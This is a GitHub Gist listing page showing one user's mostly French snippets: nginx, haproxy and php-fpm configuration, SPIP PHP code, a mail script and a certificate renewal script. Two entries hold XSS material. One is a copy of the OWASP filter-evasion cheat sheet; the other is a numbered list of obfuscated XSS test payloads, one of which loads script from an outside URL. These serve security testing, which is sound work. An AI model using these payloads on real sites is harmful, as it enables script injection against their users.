Skip to content

Instantly share code, notes, and snippets.

tech-nova

Block or report user

Report or block tech-nova

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@tech-nova
tech-nova / seenthis.conf
Created Feb 24, 2017
Le pool php5-fpm pour seenthis
View seenthis.conf
; Start a new pool named 'www'.
; the variable $pool can we used in any directive and will be replaced by the
; pool name ('www' here)
[www_seenthis]
; Per pool prefix
; It only applies on the following directives:
; - 'access.log'
; - 'slowlog'
; - 'listen' (unixsocket)
@tech-nova
tech-nova / seenthis.net.conf
Last active Feb 24, 2017
Configuration de nginx pour seenthis
View seenthis.net.conf
# Les autres redirections sont gerees par default.conf
server {
listen 8080;
server_name seenthis.net;
access_log /var/www/seenthis.net/log/access.log combined buffer=512k flush=60m;
error_log /var/www/seenthis.net/log/error.log crit;
root /var/www/seenthis.net/public_html;
@tech-nova
tech-nova / haproxy.cfg
Created Feb 24, 2017
Configuration de haproxy
View haproxy.cfg
global
log /dev/log local0
log /dev/log local1 notice
chroot /var/lib/haproxy
stats socket /run/haproxy/admin.sock mode 660 level admin
stats timeout 30s
user haproxy
group haproxy
daemon
@tech-nova
tech-nova / haproxy.cfg
Created Jun 12, 2016 — forked from rnewson/haproxy.cfg
haproxy.cfg stanzas to enable Perfect Forward Secrecy and HTTP Strict Transport Security. Requires OpenSSL 1.0.1g or so.
View haproxy.cfg
# Bind SSL port with PFS-enabling cipher suite
bind :443 ssl crt path_to_certificate no-tls-tickets ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-RSA-RC4-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES128-SHA:AES256-SHA256:AES256-SHA:RC4-SHA
# Distinguish between secure and insecure requests
acl secure dst_port eq 443
# Mark all cookies as secure if sent over SSL
rsprep ^Set-Cookie:\ (.*) Set-Cookie:\ \1;\ Secure if secure
# Add the HSTS header with a 1 year max-age
@tech-nova
tech-nova / balise_dynamique_perso.php
Created Apr 9, 2016
Créer une balise dynamique perso
View balise_dynamique_perso.php
<?php
function balise_GESTION_TRUC ($p) {
return calculer_balise_dynamique($p, 'GESTION_TRUC', array());
}
function balise_GESTION_TRUC_dyn() {
// Faire des choses en PHP
// Retourner directement un résultat à afficher
@tech-nova
tech-nova / mail_form_utf8_content.php
Last active Mar 10, 2016
Pour envoyer un mail en utf-8 (code forgé à la main)
View mail_form_utf8_content.php
<?php
// Code utilisé pour envoyer un message utf8
// Sous deux formats (html + texte)
// Sans problème d'accent
// Les données injectées dans le mail proviennent d'une page encodée en utf_8
// via <meta charset>
$message_txt = sprintf(utf8_encode("Vous avez reçu un message depuis le formulaire de contact :
@tech-nova
tech-nova / statistiques sur les clics
Last active Feb 19, 2016
Des statistiques sur les 6 derniers mois
View statistiques sur les clics
<?php
if (!defined("_ECRIRE_INC_VERSION")) return; // securiser
include_spip("base/clics");
function action_stats() {
include_spip("inc/filtres");
$lastmonth = mktime(0, 0, 0, date("m")-6, date("d"), date("Y"));
if (!_request('min') OR !_request('max')) {
$url1 = parametre_url(self(),'min',sinon(_request('min'),date('Y-m-d',$lastmonth)));
View xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
View Quelques expressions pour tester du XSS
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
@tech-nova
tech-nova / le-renew.sh
Created Jan 14, 2016
Script pour renouveler le certificat Letsencrypt lorsqu'il a moins de 30 jours de validité
View le-renew.sh
#!/bin/bash
# Avec /etc/cron.d/check-letsencrypt pour renouveler le certificat Letsencrypt
# 30 1 * * 1 root /usr/local/sbin/le-renew-webroot >> /var/log/le-renewal.log
# Configuration de nginx : centminmod
web_service='nginx'
domain='epoxit.com'
config_file="/home/nginx/domains/$domain/private/letsencrypt/le-renew-webroot.ini"
You can’t perform that action at this time.